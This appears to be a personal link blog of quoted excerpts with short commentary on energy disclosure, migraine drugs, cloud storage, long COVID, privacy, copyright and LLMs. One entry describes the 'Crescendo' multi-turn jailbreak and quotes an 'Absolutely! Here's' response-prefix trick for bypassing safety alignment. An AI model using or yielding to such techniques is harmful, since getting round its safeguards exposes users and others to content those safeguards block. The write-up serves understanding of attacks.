    Sunday September 15th was the deadline for every single organisation in Europe operating a datacentre of more than 500 KW, to publicly disclose: how much electricity they used in the last year; how much power came from renewable sources, and how much of this relied on the company buying increasingly controversial ‘unbundled’ renewable energy credits; how much water they used; and many more datapoints [...] Where this information is being disclosed, in the public domain, and discoverable, [the Green Web Foundation] intend to link to it and make it easier to find. [....] There are some concessions for organisations that have classed this information as a trade secret or commercially confidential. In this case there is a second law passed, the snappily titled Commission Delegated Regulation (EU) 2024/1364, that largely means these companies need to report this information too, but to the European Commission instead. There will be a public dataset published based on this reporting released next year, containing data an agreggated level.

    (tags: datacenter emissions energy sustainability gwf via:chris-adams eu europe ec)

Migraines, and CGRP inhibitors

Over the past decade or so, I've been suffering with chronic migraine, sometimes with multiple attacks per week. It's been a curse -- not only do you have to suffer the periodic migraine attacks, but also the "prodrome", where unpleasant symptoms like brain fog and an inability to concentrate can impact you.

After a long process of getting a referral to the appropriate headache clinic, and eliminating other possible medications, I finally got approved to receive Ajovy (fremanezumab), one of the new generation of CGRP inhibitor monoclonals -- these work by blocking the action of a peptide on receptors in your brain. I started the course of these a month ago.

The results have, frankly, been amazing. As I hoped, the migraine episodes have reduced in frequency, and in impact; they are now milder. But on top of that, I hadn't realised just how much impact the migraine "prodrome" had been having on my day-to-day life. I now have more ability to concentrate, without it causing a headache or brain fog; I have more energy and am less exhausted on a day-to-day basis; judging by my CPAP metrics, I'm even sleeping better. It is a radical improvement. After 10 years I'd forgotten what it was like to be able to concentrate for prolonged periods!

They are so effective that the American Headache Society is now recommending them as a first-line option for migraine prevention, ahead of almost all other treatments.

If you're a migraine sufferer, this is a game changer. I'm delighted. It seems there may even be further options of concomitant treatment with other CGRP-targeting medications in the future, to improve matters further.

More papers on the topic: a real-world study on CGRP inhibitor effectiveness after 6 months; no "wearing-off" effect is expected.

Paying down tech debt

  • Paying down tech debt

    by Gergely Orosz and Lou Franco:

    Q: “I’d like to make a better case for paying down tech debt on my team. What are some proven approaches for this?” The tension in finding the right balance between shipping features and paying down accumulated tech debt is as old as software engineering. There’s no one answer on how best to reduce tech debt, and opinion is divided about whether zero tech debt is even a good thing to aim for. But approaches for doing it exist which work well for most teams. To tackle this eternal topic, I turned to industry veteran Lou Franco, who’s been in the software business for over 30 years as an engineer, EM, and executive. He’s also worked at four startups and the companies that later acquired them; most recently Atlassian as a Principal Engineer on the Trello iOS app.
    Apparently Lou has a book on the topic imminent.

    (tags: programming refactoring coding technical-debt tech-debt lou-franco software)

Irish Data Protection Commission launches inquiry into Google AI

  • Irish Data Protection Commission launches inquiry into Google AI

    The Data Protection Commission (DPC) today announced that it has commenced a Cross-Border[1] statutory inquiry into Google Ireland Limited (Google) under Section 110 of the Data Protection Act 2018. The statutory inquiry concerns the question of whether Google has complied with any obligations that it may have had to undertake an assessment, pursuant to Article 35[2] of the General Data Protection Regulation (Data Protection Impact Assessment), prior to engaging in the processing of the personal data of EU/EEA data subjects associated with the development of its foundational AI model, Pathways Language Model 2 (PaLM 2). A Data Protection Impact Assessment (DPIA)[3], where required, is of crucial importance in ensuring that the fundamental rights and freedoms of individuals are adequately considered and protected when processing of personal data is likely to result in a high risk.
    Great to see this. If this inquiry results in some brakes on the widespread misuse of "fair use" in AI scraping, particularly where it concerns European citizens, I'm all in favour.

    (tags: eu law scraping fair-use ai dpia dpc data-protection privacy gdpr)

Amazon S3 now supports strongly-consistent conditional writes

  • Amazon S3 now supports strongly-consistent conditional writes

    This is a bit of a gamechanger: "Amazon S3 adds support for conditional writes that can check for the existence of an object before creating it. This capability can help you more easily prevent applications from overwriting any existing objects when uploading data. You can perform conditional writes using PutObject or CompleteMultipartUpload API requests in both general purpose and directory buckets. Using conditional writes, you can simplify how distributed applications with multiple clients concurrently update data in parallel across shared datasets. Each client can conditionally write objects, making sure that it does not overwrite any objects already written by another client. This means you no longer need to build any client-side consensus mechanisms to coordinate updates or use additional API requests to check for the presence of an object before uploading data. Instead, you can reliably offload such validations to S3, enabling better performance and efficiency for large-scale analytics, distributed machine learning, and other highly parallelized workloads. To use conditional writes, you can add the HTTP if-none-match conditional header along with PutObject and CompleteMultipartUpload API requests. This feature is available at no additional charge in all AWS Regions, including the AWS GovCloud (US) Regions and the AWS China Regions."

    (tags: s3 aws conditional-writes distcomp architecture storage consistency)

AI worse than humans at summarising information, trial finds

  • AI worse than humans at summarising information, trial finds

    Human summaries ran up the score by significantly outperforming on identifying references to ASIC documents in the long document, a type of task that the report notes is a “notoriously hard task” for this type of AI. But humans still beat the technology across the board. Reviewers told the report’s authors that AI summaries often missed emphasis, nuance and context; included incorrect information or missed relevant information; and sometimes focused on auxiliary points or introduced irrelevant information. Three of the five reviewers said they guessed that they were reviewing AI content. The reviewers’ overall feedback was that they felt AI summaries may be counterproductive and create further work because of the need to fact-check and refer to original submissions which communicated the message better and more concisely. 

    (tags: ai government llms summarisation asic llama2-70b)

1 in 50 brits have long COVID, according to new study

  • 1 in 50 brits have long COVID, according to new study

    That is a shocking figure.

    In the new paper, researchers from the Nuffield Department of Primary Care Health Sciences, in collaboration with colleagues from the Universities of Leeds and Arizona, analysed dozens of previous studies into Long COVID to examine the number and range of people affected, the underlying mechanisms of disease, the many symptoms that patients develop, and current and future treatments.   They found: Long COVID affects approximately 1 in 50 people in UK and a similar or higher proportion in many other countries; People of any age, gender and ethnic background can be affected; Long COVID results from complex biological mechanisms, which lead to a wide range of symptoms including fatigue, cognitive impairment / ‘brain fog’, breathlessness and pain; Long COVID may persist for years, causing long-term disability; There is currently no cure, but research is ongoing; Risk of Long COVID can be reduced by avoiding infection (e.g., by ensuring COVID vaccines and boosters are up to date and wearing a well-fitted high filtration mask) and taking antivirals promptly if infected.

    (tags: long-covid covid-19 medicine health disease uk trish-greenhaigh)

the “Old Friends” immunology hypothesis

  • the "Old Friends" immunology hypothesis

    How the "Old Friends" hypothesis is taking over from the hygiene hypothesis:

    Homo Sapiens first evolved some 300,000 years ago, yet crowd infections are believed to have only developed in the last 12,000 years, a small blip in human history. Humans living in dense cities is a relatively recent development. An even more recent development is that of sealed indoor spaces and frequent international air travel. Many crowd infections, such as measles, mumps, chickenpox, colds, and flu, are airborne, spreading when humans talk and breathe in close contact, with poor ventilation. These infections could not widely spread until the last few hundred years of human history. When I began studying immunology, something that surprised me is how much of the immune system is focused on fighting parasites. There is an entire branch, including several cell types, devoted to this. It seems like such a mismatch to the modern, industrialized world. “Can I have a few more immune cell types focused on viruses or intracellular bacteria?” I thought, “in exchange for some of these parasite-focused cells that I’m not using?” Our “old friends” are quite different from the crowd infections that plague us now – it would be bizarre to assume that research based on one of these categories will apply to the other! Our “old friends”, parasitic worms and beneficial microbes, are associated with a reduced risk of allergies and autoimmune diseases. No such relationship exists for crowd diseases. In fact, the opposite is true. Crowd diseases contribute to allergies and autoimmune diseases. Comparing the immune system to a muscle that gets stronger with use is overly simplistic and, in many cases, inaccurate. There is huge variety in how various pathogens impact us. Being precise in considering different types of microbes and infections will allow us to better understand human health.

    (tags: articles health medicine immunology old-friends hygiene-hypothesis allergies autoimmune disease parasites)

Why heroism is bad, and what we can do to stop it

EUMETNET OPERA

  • EUMETNET OPERA

    The Operational Program for Exchange of Weather Radar Information (OPERA) from the European National Meteorological Services (EUMETNET) -- 1km-square resolution open data of current precipitation levels over Ireland and the rest of Europe, with a 5 minute latency and granularity. May be useful for a project I'm thinking of... Also related, AROME immediate forecasts: https://portail-api.meteofrance.fr/web/api/AROME-PI

    (tags: eumetnet meteorology weather rainfall rain forecasting eu europe ireland)

Clustering ideas with Llamafile

  • Clustering ideas with Llamafile

    Working through the process of applying a local LLM to idea-clustering and labelling: - map the notes as points in a semantic space using vector embeddings; - apply k-means clustering to group nearby points in space; - map points back to groups of notes, then use a large language model to generate labels. This is interesting; I particularly like the use of local hardware

    (tags: ai llm llamafile clustering labelling ml)

Ex-Google CEO: AI startups can steal IP, hire lawyers to “clean up the mess”

  • Ex-Google CEO: AI startups can steal IP, hire lawyers to “clean up the mess”

    Ex-Google CEO, VC, and "Licensed arms dealer to the US military" Eric Schmidt:

    here’s what I propose each and every one of you do: Say to your LLM the following: “Make me a copy of TikTok, steal all the users, steal all the music, put my preferences in it, produce this program in the next 30 seconds, release it, and in one hour, if it’s not viral, do something different along the same lines.” [...] If it took off, then you’d hire a whole bunch of lawyers to go clean the mess up, right? But if nobody uses your product, it doesn’t matter that you stole all the content. And do not quote me.
    jfc. Needless to say he also has some theories about ChatGPT eating Google's lunch because of.... remote working.

    (tags: law legal startups ethics eric-schmidt capitalism ip)

Engine Lines: Killing by Numbers

  • Engine Lines: Killing by Numbers

    from James Tindall, "This is the Tyranny of the Recommendation Algorithm given kinetic and malevolent flesh" --

    Eventually there were days where Israel’s air force had already reduced the previous list of targets to rubble, and the system was not generating new targets that qualified at the current threshold required for residents of Gaza to be predicted as ‘legitimate military targets,’ or ‘sufficiently connected to Hamas.’ Pressure from the chain of command to produce new targets, presumably from a desire to satisfy internal murder targets, meant that the bar at which a Gaza resident would be identified as a legitimate Hamas target was simply lowered. At the lower threshold, the system promptly generated a new list of thousands of targets. At what threshold, from 100 to 1, will the line be drawn, the decision made that the bar can be lowered no more, and the killing stop? Or will the target predictions simply continue while there remain Palestinians to target? Spotify’s next song prediction machine will always predict a next song, no matter how loosely the remaining songs match the target defined by your surveilled activity history. It will never apologise and declare: “Sorry, but there are no remaining songs you will enjoy.”

    (tags: algorithms recommendations israel war-crimes genocide gaza palestine targeting)

The Soul of Maintaining a New Machine

  • The Soul of Maintaining a New Machine

    This is really fascinating stuff, on "communities of practice", from Stewart Brand:

    They ate together every chance they could.  They had to.  The enormous photocopiers they were responsible for maintaining were so complex, temperamental, and variable between models and upgrades that it was difficult to keep the machines functioning without frequent conversations with their peers about the ever-shifting nuances of repair and care.  The core of their operational knowledge was social.  That’s the subject of this chapter. It was the mid-1980s.  They were the technician teams charged with servicing the Xerox machines that suddenly were providing all of America’s offices with vast quantities of photocopies and frustration.  The machines were so large, noisy, and busy that most offices kept them in a separate room.   An inquisitive anthropologist discovered that what the technicians did all day with those machines was grotesquely different from what Xerox corporation thought they did, and the divergence was hampering the company unnecessarily.  The saga that followed his revelation is worth recounting in detail because of what it shows about the ingenuity of professional maintainers at work in a high-ambiguity environment, the harm caused by an institutionalized wrong theory of their work, and the invincible power of an institutionalized wrong theory to resist change.

    (tags: anthropology culture history maintenance repair xerox technicians tech communities-of-practice maintainers ops)

Digital Apartheid in Gaza: Unjust Content Moderation at the Request of Israel’s Cyber Unit

  • Digital Apartheid in Gaza: Unjust Content Moderation at the Request of Israel’s Cyber Unit

    from the EFF:

    Government involvement in content moderation raises serious human rights concerns in every context. Since October 7, social media platforms have been challenged for the unjustified takedowns of pro-Palestinian content—sometimes at the request of the Israeli government—and a simultaneous failure to remove hate speech towards Palestinians. More specifically, social media platforms have worked with the Israeli Cyber Unit—a government office set up to issue takedown requests to platforms—to remove content considered as incitement to violence and terrorism, as well as any promotion of groups widely designated as terrorists.  .... Between October 7 and November 14, a total of 9,500 takedown requests were sent from the Israeli authorities to social media platforms, of which 60 percent went to Meta with a reported 94% compliance rate.  This is not new. The Cyber Unit has long boasted that its takedown requests result in high compliance rates of up to 90 percent across all social media platforms. They have unfairly targeted Palestinian rights activists, news organizations, and civil society; one such incident prompted Meta’s Oversight Board to recommend that the company “Formalize a transparent process on how it receives and responds to all government requests for content removal, and ensure that they are included in transparency reporting.” When a platform edits its content at the behest of government agencies, it can leave the platform inherently biased in favor of that government’s favored positions. That cooperation gives government agencies outsized influence over content moderation systems for their own political goals—to control public dialogue, suppress dissent, silence political opponents, or blunt social movements. And once such systems are established, it is easy for the government to use the systems to coerce and pressure platforms to moderate speech they may not otherwise have chosen to moderate.

    (tags: activism censorship gaza israel meta facebook whatsapp eff palestine transparency moderation bias)

The LLMentalist Effect

  • The LLMentalist Effect

    "How chat-based Large Language Models replicate the mechanisms of a psychic's con":

    RLHF models in general are likely to reward responses that sound accurate. As the reward model is likely just another language model, it can’t reward based on facts or anything specific, so it can only reward output that has a tone, style, and structure that’s commonly associated with statements that have been rated as accurate. [....] This is why I think that RLHF has effectively become a reward system that specifically optimises language models for generating validation statements: Forer statements, shotgunning, vanishing negatives, and statistical guesses. In trying to make the LLM sound more human, more confident, and more engaging, but without being able to edit specific details in its output, AI researchers seem to have created a mechanical mentalist. Instead of pretending to read minds through statistically plausible validation statements, it pretends to read and understand your text through statistically plausible validation statements.

    (tags: ai chatgpt llms ml psychology cons mind-reading psychics)

Gaggiuino

  • Gaggiuino

    This is a very tempting mod to add to my Gaggia Classic espresso machine. Although I'd probably need to buy a backup first -- my wife might kill me if I managed to break the most important device in the house... "With Gaggiuino, you can exactly control the pressure, temperature, and flow of the shot over the exact duration of the shot, and build that behavior out as a custom profile. One pre-programmed profile attempts to mimic the style of a Londinium R Lever machine. Another creates filter coffee. Yet another preinfuses the basket, allowing the coffee to bloom and maximizing the potential extraction. While other machines do do this (I would be remiss to not mention the Decent Espresso machine, itself an important milestone), they often cost many thousands of dollars and use proprietary technology. Gaggiuino on the other hand, is user installed and much more open."

    (tags: gaggia gaggia-classic espresso coffee hacks gaggiuino mods)

LLMs and “summarisation”

  • LLMs and "summarisation"

    This is an excellent article about the limitations of LLMs and their mechanism when asked to summarise a document:

    ChatGPT doesn’t summarise. When you ask ChatGPT to summarise this text, it instead shortens the text. And there is a fundamental difference between the two. To summarise, you need to understand what the paper is saying. To shorten text, not so much. To truly summarise, you need to be able to detect that from 40 sentences, 35 are leading up to the 36th, 4 follow it with some additional remarks, but it is that 36th that is essential for the summary and that without that 36th, the content is lost. But that requires a real understanding that is well beyond large prompts (the entire 50-page paper) and hundreds of billions of parameters.

    (tags: ai chatgpt llms language summarisation)

The “Crescendo” LLM jailbreak

  • The "Crescendo" LLM jailbreak

    An explanation of this LLM jailbreaking technique, which effectively overrides the fine-tuning "safety" parameters through repeated prompting ("context") attacks: "Crescendo can be most simply described as using one ‘learning’ method of LLMs — in-context learning: using the prompt to influence the result — overriding the safety that has been created by the other ‘learning’ — fine-tuning, which changes the model’s parameters. [...] What Crescendo does is use a series of harmless prompts in a series, thus providing so much ‘context’ that the safety fine-tuning is effectively neutralised. [...] Intuitively, Crescendo is able to jailbreak a target model by progressively asking it to generate related content until the model has generated sufficient content to essentially override its safety alignment." I also found this very informative: "people have jailbroken [LLMs] “by instructing the model to start its response with the text “Absolutely! Here’s” when performing the malicious task, which successfully bypasses the safety alignment“. This is a good example of the core operation of LLMs, that it is ‘continuation’ [of a string of text] and not ‘answering’".

    (tags: llms jailbreaks infosec vulnerabilities exploits crescendo attacks)

Gideon Meyerowitz-Katz reviews _The Cass Report_

  • Gideon Meyerowitz-Katz reviews _The Cass Report_

    Epidemiologist and writer (TIME, STAT News, Slate, Guardian, etc) looks into _The Cass Review Into Gender Identity Services For Children_, the recent review of gender identity services in the UK (which has also been referred to in Ireland), and isn't impressed:

    In some cases [...] the review contains statements that are false regardless of what your position on healthcare for transgender children is. Take the “exponential” rise in transgender children that the review spends so much time on. It’s true that there has been a dramatic rise in the number of children with gender dysphoria. The rise mostly occurred between 2011-2015, and has plateaued since. These are facts. One theory that may explain the facts is that this is caused by changing diagnostic criteria - when we changed the diagnosis from gender identity disorder to the much broader gender dysphoria, this included many more children. We’ve seen this exact trend happen with everything from autism to diabetes, and we know that broadening diagnostic criteria almost always results in more people with a condition. Another theory is that these changes were caused by the internet. [...] The Cass review treated these two theories unequally. The first possible explanation, which I would argue is by far the most likely, was ignored completely. The second possible explanation was given a lengthy and in-depth discussion. [...] The point is that the scientific findings of the Cass review are mostly about uncertainty. We are uncertain about the causes of a rise in trans kids, and uncertain about the best treatment modalities. But everything after that is opinion. The review did not even consider the question of whether normal puberty is a problem for transgender children, or whether psychotherapy can be harmful. That’s why these are now the only options in the UK - medical treatments were assumed to be harmful, while non-medical interventions (or even no treatment at all) were assumed harmless. [...] What we can say with some certainty is that the most impactful review of gender services for children was seriously, perhaps irredeemably, flawed. The document made numerous basic errors, cited conversion therapy in a positive way, and somehow concluded that the only intervention with no evidence whatsoever behind it was the best option for transgender children.

    (tags: transgender trans uk politics cass-report cass-review gideon-m-k healthcare children teenagers gender)

Hard Drive And SSD Shucking

  • Hard Drive And SSD Shucking

    "shucking drives is the process of purchasing an external drive (eg a USB or Thunderbolt external storage drive in a sealed enclosure), then opening it up in efforts to get the drive inside -- which can often work out cheaper than buying the bare internal drive on it’s own".

    If you are looking at making a significant saving on larger capacity HDDs or picking up much faster NVMe SSDs for a bargain price, then shucking will likely be one of the first methods that you have considered. [..] As mentioned [..] earlier this month, the reasons an external drive can often be cheaper can range from the drive inside being white labelled versions of a consumer drive, or the drive being allocated in bulk at production therefore removing it from the buy/sell/currency variables of bare drives or even simply that your USB 3.2 external drive is bottlenecking the real performance of the drive inside. For whatever the reason, HDD and SSD Shucking still continues to be a desirable practice with cost-aware buyers online. But there is one little problem – that the brands VERY RARELY say which HDD or SSD they choose to use in their external drives. Therefore choosing the right external drive for shucking can have an element of luck and/or risk involved. So, in today’s article, I want to talk you through a bunch of ways to identify the HDD/SSD inside an external drive without opening it, as well as highlight the risks you need to be aware of and finally shock my research after searching the internet for information to consolidate the drives inside many, many external drive enclosures from Seagate, WD and Toshiba.

    (tags: shucking hdds disks ssds storage home self-hosting drives ops usb)

Actual Budget

  • Actual Budget

    a really nice, fast, and privacy-focused self-hosted web app to manage personal finances. At its heart is the well proven Envelope Budgeting methodology. You own your data and can do whatever you want with it. Featuring multi-device sync, optional end-to-end encryption, an API, and full sync with banks supported by GoCardless (which includes Revolut and AIB in my case).

    (tags: finances open-source self-hosted budgeting money banking banks)

FOSS funding vanishes from EU’s 2025 Horizon program plans

  • FOSS funding vanishes from EU's 2025 Horizon program plans

    EU funding for open source dries up, redirected to AI slop instead:

    Funding for free and open source software (FOSS) initiatives under the EU's Horizon program has mostly vanished from next year's proposal, claim advocates who are worried for the future of many ongoing projects. Pierre-Yves Gibello, CEO of open-source consortium OW2, urged EU officials to re-evaluate the elimination of funding for the Next Generation Internet (NGI) initiative from its draft of 2025 Horizon funding programs in a recently published open letter. Gibello said the EU's focus on enterprise-level FOSS is essential as the US, China and Russia mobilize "huge public and private resources" toward capturing the personal data of consumers, which the EU's regulatory regime has decided isn't going to fly in its territory. [....] "Our French [Horizon national contact point] was told - as an unofficial answer - that because lots of [Horizon] budget are allocated to AI, there is not much left for Internet infrastructure," Gibello said.

    (tags: ai funding eu horizon foss via:the-register ow2 europe)

Retool

  • Retool

    A decent looking no-code app builder, recommended by Cory of Last Week In AWS. Nice features: * offers a self-hosted version running in a Docker container * Free tier for up to 5 users and 500 workflow runs per month * Integration with AWS services (S3, Athena, DynamoDB), Postgres, MySQL and Google Sheets * Push notifications for mobile

    (tags: retool apps hacking no-code coding via:lwia integration)

Invasions of privacy during the early years of the photographic camera

  • Invasions of privacy during the early years of the photographic camera

    "Overexposed", at the History News Network:

    In 1904, a widow named Elizabeth Peck had her portrait taken at a studio in a small Iowa town. The photographer sold the negatives to Duffy’s Pure Malt Whiskey, a company that avoided liquor taxes for years by falsely advertising its product as medicinal. Duffy’s ads claimed the fantastical: that it cured everything from influenza to consumption; that it was endorsed by clergymen; that it could help you live until the age of 106. The portrait of Elizabeth Peck ended up in one of these dubious ads, published in newspapers across the country alongside what appeared to be her unqualified praise: “After years of constant use of your Pure Malt Whiskey, both by myself and as given to patients in my capacity as nurse, I have no hesitation in recommending it.” Duffy’s lies were numerous. Elizabeth Peck was not a nurse, and she had not spent years constantly slinging back malt beverages. In fact, she fully abstained from alcohol. Peck never consented to the ad.  The camera’s first great age — which began in 1888 when George Eastman debuted the Kodak — is full of stories like this one. Beyond the wonders of a quickly developing artform and technology lay widespread lack of control over one’s own image, perverse incentives to make a quick buck, and generalized fear at the prospect of humiliation and the invasion of privacy.
    Fantastic story, and interesting to see parallels with the modern experience of AI.

    (tags: ai future history photography privacy camera)

Phone geodata is being widely collected by US government agencies

  • Phone geodata is being widely collected by US government agencies

    More info on the current state of the post-Snowden geodata scraping:

    [Byron Tau was told] the government was buying up reams of consumer data — information scraped from cellphones, social media profiles, internet ad exchanges and other open sources — and deploying it for often-clandestine purposes like law enforcement and national security in the U.S. and abroad. The places you go, the websites you visit, the opinions you post — all collected and legally sold to federal agencies. In his new book, _Means of Control_, Tau details everything he’s learned since that dinner: An opaque network of government contractors is peddling troves of data, a legal but shadowy use of American citizens’ information that troubles even some of the officials involved. And attempts by Congress to pass privacy protections fit for the digital era have largely stalled, though reforms to a major surveillance program are now being debated.
    Great quote:
    Politico: You compare to some degree the state of surveillance in China versus the U.S. You write that China wants its citizens to know that they’re being tracked, whereas in the U.S., “the success lies in the secrecy.” What did you mean by that? That was a line that came in an email from a police officer in the United States who got access to a geolocation tool that allowed him to look at the movement of phones. And he was essentially talking about how great this tool was because it wasn’t widely, publicly known. The police could buy up your geolocation movements and look at them without a warrant. And so he was essentially saying that the success lies in the secrecy, that if people were to know that this was what the police department was doing, they would ditch their phones or they would not download certain apps.
    Based on Wolfie Christl's research in Germany, the same data is being scraped here, too, regardless of any protection the GDPR might supposedly provide: https://x.com/WolfieChristl/status/1813221172927975722

    (tags: government privacy surveillance geodata phones mobile us-politics data-protection gdpr)

Mini.WebVM

  • Mini.WebVM

    Your own Linux box, build from a Dockerfile, virtualized in the browser via WebAssembly:

    WebVM is a Linux-like virtual machine running fully client-side in the browser. It is based on CheerpX: a x86 execution engine in WebAssembly by Leaning Technologies. With today’s update, you can deploy your own version of WebVM by simply forking the repo on GitHub and editing the included Dockerfile. A GitHub Actions workflow will automatically deploy it to GitHub pages.
    This is absurdly cool. Demo at https://webvm.io/ (via Oisin)

    (tags: docker virtualization webassembly wasm web containers webvm virtual-machines hacks via:oisin)

OliveTin

  • OliveTin

    "Give safe and simple access to predefined shell commands from a web interface." This is great; my home server has a small set of hacky CGI scripts to run things like df(1), nice to have a nicer UI for this purpose

    (tags: ui cli shell self-hosted home unix linux web)

_An Architectural Risk Analysis of Large Language Models_ [pdf]

  • _An Architectural Risk Analysis of Large Language Models_ [pdf]

    The Berryville Institute of Machine Learning presents "a basic architectural risk analysis (ARA) of large language models (LLMs), guided by an understanding of standard machine learning (ML) risks as previously identified". "This document identifies a set of 81 specific risks associated with an LLM application and its LLM foundation model. We organize the risks by common component and also include a number of critical LLM black box foundation model risks as well as overall system risks. Our risk analysis results are meant to help LLM systems engineers in securing their own particular LLM applications. We present a list of what we consider to be the top ten LLM risks (a subset of the 81 risks we identify). In our view, the biggest challenge in secure use of LLM technology is understanding and managing the 23 risks inherent in black box foundation models. From the point of view of an LLM user (say, someone writing an application with an LLM module, someone using a chain of LLMs, or someone simply interacting with a chatbot), choosing which LLM foundation model to use is confusing. There are no useful metrics for users to compare in order to make a decision about which LLM to use, and not much in the way of data about which models are best to use in which situations or for what kinds of application. Opening the black box would make these decisions possible (and easier) and would in turn make managing hidden LLM foundation risks possible. For this reason, we are in favor of regulating LLM foundation models. Not only the use of these models, but the way in which they are built (and, most importantly, out of what) in the first place." This is excellent as a baseline for security assessment of LLM-driven systems. (via Adam Shostack)

    (tags: security infosec llms machine-learning biml via:adam-shostack ai risks)

Long Covid: The Answers

  • Long Covid: The Answers

    A new, reliable resource for LC sufferers, featuring expert advice from Prof Danny Altmann, Dr Funmi Okunola, and Dr Daniel Griffin (of This Week in Virology fame):

    Navigating the complexities of long Covid can feel overwhelming amidst the sea of conflicting and mis- information. That's why we've built Long Covid The Answers: to provide clarity and credible insights. We're proud to have a Certified CPD Podcast for Educating Medical Staff.  Earn certified up to 15 Mainpro+® credits for the podcast series! Earn Certified CPD credits indirectly using the site in your clinical practice. We're dedicated to providing hand-curated, credible information and relief for individuals battling Long COVID. We're proud to have a team of esteemed Doctors, Professors, Scientists, and individuals directly affected by long Covid and their caregivers onboard.
    Given the decent profile of the experts involved, this could be handy for anyone attempting to receive treatment for LC and facing ignorance from their healthcare providers.

    (tags: long-covid covid-19 medicine health)

The bogus CVE problem [LWN.net]

  • The bogus CVE problem [LWN.net]

    As curl's Daniel Stenberg writes:

    It was obvious already before that NVD really does not try very hard to actually understand or figure out the problem they grade. In this case it is quite impossible for me to understand how they could come up with this severity level. It's like they saw "integer overflow" and figure that wow, yeah that is the most horrible flaw we can imagine, but clearly nobody at NVD engaged their brains nor looked at the "vulnerable" code or the patch that fixed the bug. Anyone that looks can see that this is not a security problem.

    (tags: cve cvss infosec security-circus lwn vulnerabilities curl soc2)

DOJ seizes ‘bot farm’ operated by RT editor on behalf of the Russian government

  • DOJ seizes ‘bot farm’ operated by RT editor on behalf of the Russian government

    Lest anyone was thinking Russian bot farms were no more after the demise of Prigozhin:

    The Department of Justice announced on Tuesday that it seized two domain names and more than 900 social media accounts it claims were part of an “AI-enhanced” Russian bot farm. Many of the accounts were designed to look like they belonged to Americans and posted content about the Russia-Ukraine war, including videos in which Russian President Vladimir Putin justified Russia’s invasion of Ukraine.  The Justice Department claims that an employee of RT — Russia’s state media outlet — was behind the bot farm. RT’s leadership signed off on a plan to use the bot farm to “distribute information on a wide-scale basis,” amplifying the publication’s reach on social media,” an FBI agent alleged in an affidavit. To set up the bot farm, the employee bought two domain names from Namecheap, an Arizona-based company, that were then used to create two email servers, the affidavit claims. The servers were then used to create 968 email addresses, which were in turn used to set up social media accounts, according to the affidavit and the DOJ.  The effort was concentrated on X, where profiles were created with Meliorator, an “AI-enabled bot farm generation and management software”. “Russia intended to use this bot farm to disseminate AI-generated foreign disinformation, scaling their work with the assistance of AI to undermine our partners in Ukraine and influence geopolitical narratives favorable to the Russian government.”
    Looks like it used a lot of now quite familiar bot attributes, such as following high-profile accounts and other bot accounts, liking other bot posts, and using AI-generated profile images. It's not clear but it sounds like the content posted is also AI-generated based on defined "personalities". More on Meliorator and the operations of this AI bot farming tool, in this Joint Advisory PDF: https://www.ic3.gov/Media/News/2024/240709.pdf

    (tags: bots russia bot-farms twitter x meliorator ai social-media spam propaganda rt ukraine)

Preliminary Notes on the Delvish Dialect, by Bruce Sterling

  • Preliminary Notes on the Delvish Dialect, by Bruce Sterling

    I’m inventing a handy neologism (as is my wont), and I’m calling all of these Large Language Model dialects “Delvish.” [...] Delvish is a language of struggle. Humans struggle to identify and sometimes to weed out texts composed in “Delvish.” Why? Because humans can deploy fast-and-cheap Delvish and then falsely claim to have laboriously written these texts with human effort, all the while demanding some expensive human credit-and-reward for this machine-generated content. Obviously this native 21st-century high-tech/lowlife misdeed is a novel form of wickedness, somehow related to plagiarism, or impersonation, or false-witness, or classroom-cheating, or “fake news,” or even dirt-simple lies and frauds, but newly chrome-plated with AI machine-jargon. These newfangled crimes need a whole set of neologisms, but in the meantime, the frowned-upon Delvish dialect is commonly Considered-Bad and is under active linguistic repression. Unwanted, spammy Delvish content has already acquired many pejorative neologisms, such as “fluff,” “machine slop,” “botshit” and “ChatGPTese.” Apparently good or bad, they’re all Delvish, though. Some “Delvish” is pretty easy to recognize, because of how it feels to the reader. The emotional affect of LLM consumer-chatbots has the tone of a servile, cringing, oddly scatterbrained university professor. This approach to the human reader is a feature, not a bug, because it is inhumanly and conspicuously “honest, helpful and harmless.”

    (tags: commentary cyberpunk language llms delvish bruce-sterling neologisms dialects)

turbopuffer

  • turbopuffer

    A new proprietary vector-search-oriented database, built statelessly on object storage (S3) with "smart caching" on SSD/RAM -- "a solution that scales effortlessly to billions of vectors and millions of tenants/namespaces". Apparently it uses a new storage engine: "an object-storage-first storage engine where object storage is the source of truth (LSM). [...] In order to optimize cold latency, the storage engine carefully handles roundtrips to object storage. The query planner and storage engine have to work in concert to strike a delicate balance between downloading more data per roundtrip, and doing multiple roundtrips (P90 to object storage is around 250ms for <1MB). For example, for a vector search query, we aim to limit it to a maximum of three roundtrips for sub-second cold latency." HN comments thread: https://news.ycombinator.com/item?id=40916786

    (tags: aws s3 storage search vectors vector-search fuzzy-search lsm databases via:hn)

Journals should retract Richard Lynn’s racist ‘research’ articles

  • Journals should retract Richard Lynn's racist 'research' articles

    Richard Lynn was not the finest example of Irish science:

    Lynn, who died in 2023, was a professor at the University of Ulster and the president of the Pioneer Fund, a nonprofit foundation created in 1937 by American Nazi sympathizers to support “race betterment” and “race realism.” It has been a primary funding source of scientific racism and, for decades, Lynn was one of the loudest proponents of the unfounded idea that Western civilization is threatened by “inferior races” that are genetically predisposed to low intelligence, violence, and criminality. Lynn’s work has been repeatedly condemned by social scientists and biologists for using flawed methodology and deceptively collated data to support racism. In particular, he created deeply flawed datasets purporting to show differences in IQ culminating in a highly cited national IQ database. Many of Lynn’s papers appear in journals owned by the billion-dollar publishing giants Elsevier and Springer, including Personality and Individual Differences and Intelligence.
    The ESRI, for whom Lynn was a Research Professor in the 1960s and 70s, have quietly removed his output from their archives, thankfully. But as this article notes, his papers and faked datasets still feature in many prestigious journals. (via Ben)

    (tags: richard-lynn racists research papers elsevier iq via:bwalsh)

Three-finger salute: Hunger Games symbol adopted by Myanmar protesters

Microsoft AI CEO doesn’t understand copyright

  • Microsoft AI CEO doesn't understand copyright

    Mustafa Suleyman, the CEO of Microsoft AI, says "the social contract for content that is on the open web is that it's "freeware" for training AI models", and it "is fair use", and "anyone can copy it". As Ed Newton-Rex of Fairly Trained notes:

    This is categorically false. Content released online is still protected by copyright. You can't copy it for any purpose you like simply because it's on the open web. Creators who have been told for years to publish online, often for free, for exposure, may object to being retroactively told they were entering a social contract that let anyone copy their work.
    It's really shocking to see this. How on earth has Microsoft's legal department not hit the brakes on this?

    (tags: ai law legal ip open-source freeware fair-use copying piracy)